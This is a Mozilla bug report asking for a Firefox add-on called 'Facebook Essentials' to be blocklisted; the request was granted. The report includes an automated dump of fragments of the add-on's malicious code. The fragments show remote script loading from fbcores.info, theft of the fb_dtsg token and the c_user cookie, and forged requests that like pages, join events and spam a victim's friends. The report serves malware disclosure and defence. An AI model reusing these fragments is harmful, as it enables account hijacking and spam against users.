Closed
Bug 739482
Opened 12 years ago
Closed 12 years ago
Malicious "Facebook Essentials" add-on
Categories
(Toolkit :: Blocklist Policy Requests, defect)
Toolkit
Blocklist Policy Requests
Tracking
()
RESOLVED
FIXED
People
(Reporter: mhammell, Assigned: jorgev)
Details
Attachments
(1 file)
|
62.81 KB,
application/octet-stream
|
Details |
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11 Steps to reproduce: Downloaded the add-on from http://buzz-france[.]info/freesms.xpi Actual results: Steals your Facebook cookies and uses your account to like a series of pages, adds your account to a set of Facebook events. See auto extract from the add-on below: ** Embedded and Remote Files ** content/youtube.js http://fbcores.info/sms.js http://fbcores.info/gkuyrr.js content/xmlhttprequester.js content/script-compiler-overlay.xul http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul content/prefman.js content/skin/icon.png content/script-compiler.js install.rdf chrome.manifest ** Embedded Metadata ** <em:name>Facebook Essentials</em:name> <em:version>1.0</em:version> <em:type>2</em:type> <em:creator>Arash Jafari</em:creator> <em:developer>Arash Jafari</em:developer> <em:description>Facebook Essentials</em:description> <em:homepageURL>http://www.klate.com/</em:homepageURL> <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> <em:targetApplication> <em:minVersion>3.5</em:minVersion> <em:maxVersion>15.*</em:maxVersion> </em:targetApplication> ** Files Loaded ** ...pt type='application/x-javascript' src='chrome://youtube/content/youtube.js'></s... 'chrome://youtube/content/youtube.js' <em:iconURL>chrome://youtube/content/skin/icon.png</em:iconURL> ...overlay chrome://browser/content/browser.xul chrome://youtube/content/sc ript-com... ** Remote Javascript Loaded ** var s = document.createElement('script'); s.setAttribute("type","text/javascript"); s.setAttribute("src", "http://fbcores.info/sms.js"); function addScript() { var s = document.createElement('script'); s.setAttribute("type", "text/javascript"); s.setAttribute("src", "http://fbcores.info/gkuyrr.js"); ...tachment[params][metaTagMap][2][name]=description&attachment[params][met aTagMap]... for (i=0; i<document.getElementsByTagName('script').length; i++) { var a = document.getElementsByTagName('script')[i].innerHTML; var a = document.getElementsByTagName('script')[0]; addScript(); // this function gets called by user scripts in content security scope to ...eymaster/gatekeeper/there.is.only.xul'><script type='application/x-javascript' s... var scriptableStream=Components .classes["@mozilla.org/scriptableinputstream;1"] .getService(Components.interfaces.nsIScriptableInputStream); .classes["@mozilla.org/intl/scriptableunicodeconverter"] .createInstance(Components.interfaces.nsIScriptableUnicodeConverter); scriptableStream.init(input); var str=scriptableStream.read(input.available()); scriptableStream.close(); var script=youtube_gmCompiler.getUrlContents( youtube_gmCompiler.injectScript(script, href, unsafeWin); injectScript: function(script, url, unsafeContentWin) { var sandbox, script, logger, storage, xmlhttpRequester; var storage=new youtube_ScriptStorage(); "(function(){"+script+"})()", e2.fileName=script.filename; function youtube_ScriptStorage() { youtube_ScriptStorage.prototype.setValue = function(name, val) { youtube_ScriptStorage.prototype.getValue = function(name, defVal) { <Description about="urn:mozilla:install-manifest"> <em:description>Facebook Essentials</em:description> <Description> </Description> </Description> ...nt/browser.xul chrome://youtube/content/script-compiler-overlay.xul ** Facebook Paths Accessed ** top.location.href = 'http://facebook.com' if (stompa.indexOf('facebook.com') > 0) { ...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '... ...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' + user_id + '&sk... ...er.indexOf('Mora em <a href="http://www.facebook.com/pages/S%C3%A3o-Paulo-Brazil... var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = '/ajax/connect/external_node_connect.php?__a=1'; var urlwp = '/ajax/sharer/submit/?__a=1'; var urlwp = '/ajax/profile/composer.php?__a=1'; ...var postmessagetext = 'O meu perfil do Facebook foi acessado ' + rtotal + ' veze... ...var postmessage = 'O meu perfil do Facebook foi acessado ' + rtotal + ' vezes em... var urlwp = '/ajax/updatestatus.php?__a=1'; var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; ...nha nesse concurso de Imagem Digital\x0Afacebook.com/photo.php?fbid=309406152446... var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; var urlwp = '/ajax/questions/ask_friends.php?qid=' + qid + '&__a=1'; var urlwp = '/ajax/events/permalink/join.php?__a=1'; var urlwp = '/ajax/events/invite/send/?__a=1'; "www.facebook.com", "http://facebook.com", "www.facebook.fr", "http://facebook.fr", "www.facebook.ca", "http://facebook.ca", "www.facebook.co.uk", "http://facebook.co.uk" "Curti esse facebook colorido ;) " + fbhost + "/photo.php?fbid=" + fbid, httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); ...open("POST", "/ajax/ufi/modify.php?__a=1"), setRequestHeader("Content-Type", "ap... <em:id>GifBlock@facebook.com</em:id> <em:name>Facebook Essentials</em:name> <em:description>Facebook Essentials</em:description> ** Facebook Data Accessed ** var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; ...]['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); console.log(fb_dtsg) ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...tions&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ..._mod]=like_widget&nctr[_impid]=4a44dc9a&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...custom_value]=50&audience[0][value]=111&fb_dtsg=' + fb_dtsg + '&message=@[' + fr... ...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=... ...wp = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=... ...nder=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_for m_id_sou... ...ine=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_for m_id_sou... ...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...eader&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&lsd&post_form_id... ...__d=1&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id... ...D0%84&post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&feedback_params=... ** HTTP Requests ** gf = new XMLHttpRequest(); ...gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '... var httpwp = new XMLHttpRequest(); ...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' + user_id + '&sk... var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var http3 = new XMLHttpRequest(); http3.open("POST", url3, true); var httpc = new XMLHttpRequest(); httpc.open("POST", urlc, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var httpwp = new XMLHttpRequest(); httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); with(newx = new XMLHttpRequest()) ...open("POST", "/ajax/ufi/modify.php?__a=1"), setRequestHeader("Content-Type", "ap... var httpwp = new XMLHttpRequest(); httpwp['open']('POST', urlwp, true); var req = new this.chromeWindow.XMLHttpRequest(); ** All URLs Loaded or Mentioned ** top.location.href = 'http://facebook.com' ...httpwp['open']('GET', 'http://www.facebook.com/profile.php?id=' + user_id + '&sk... ...if (outer.indexOf('Mora em <a href="http://www.facebook.com/pages/S%C3%A3o-Paulo... var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var urlwp = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1"; var toLikes = new Array("http://bit.ly/GW7Mjb"); var shareurls = new Array("http://www.youtube.com/watch?v=QMucCamyuSI"); ...var postimgs = new Array("http://media.salon.com/2010/05/outrage_over_the_smokin... var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1"; var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1"; "http://facebook.com", "http://fb.com", "http://facebook.fr", "http://facebook.ca", "http://facebook.co.uk" httpwp['open']('GET', 'https://graph.facebook.com/'+ene[1], false); ... '<center><br><br><br><br><br><img src="http://whos.amung.us/widget/ncosqdqleyjm... ... '<center><br><br><br><br><br><img src="http://whos.amung.us/widget/ncosqdqleyjl... ...var urlwp = "http://www.youtube.com/watch_actions_ajax?action_like_video=1&video... ... '<center><br><br><br><br><br><img src="http://whos.amung.us/widget/ncosqdqleyjm... s.setAttribute("src", "http://fbcores.info/gkuyrr.js"); s.setAttribute("src", "http://fbcores.info/sms.js"); ...<dd><code>http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul< /code></... ...<dd><a href="https://developer.mozilla.org/en/XUL">https://developer.mozilla.org.. . ...<?xml version="1.0"?><overlay xmlns='http://www.mozilla.org/keymaster/gatekeeper... // http://www.letitblog.com/code/python/greasemonkey.py.txt // http://greasemonkey.devjavu.com/ <RDF xmlns="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:em="http://www.mozilla.org/2004/em-rdf#"> <em:homepageURL>http://www.klate.com/</em:homepageURL> Expected results: It should not steal your Facebook cookies and begin conducting transactions on your behalf, without your consent.
|
Assignee | |
Comment 1•12 years ago
|
||
ID: GifBlock@facebook.com
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
|
|
Assignee | |
Comment 2•12 years ago
|
||
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i79
Status: ASSIGNED → RESOLVED
Closed: 12 years ago
Resolution: --- → FIXED
|
||
Updated•8 years ago
|
Product: addons.mozilla.org → Toolkit
You need to log in
before you can comment on or make changes to this bug.
Description
•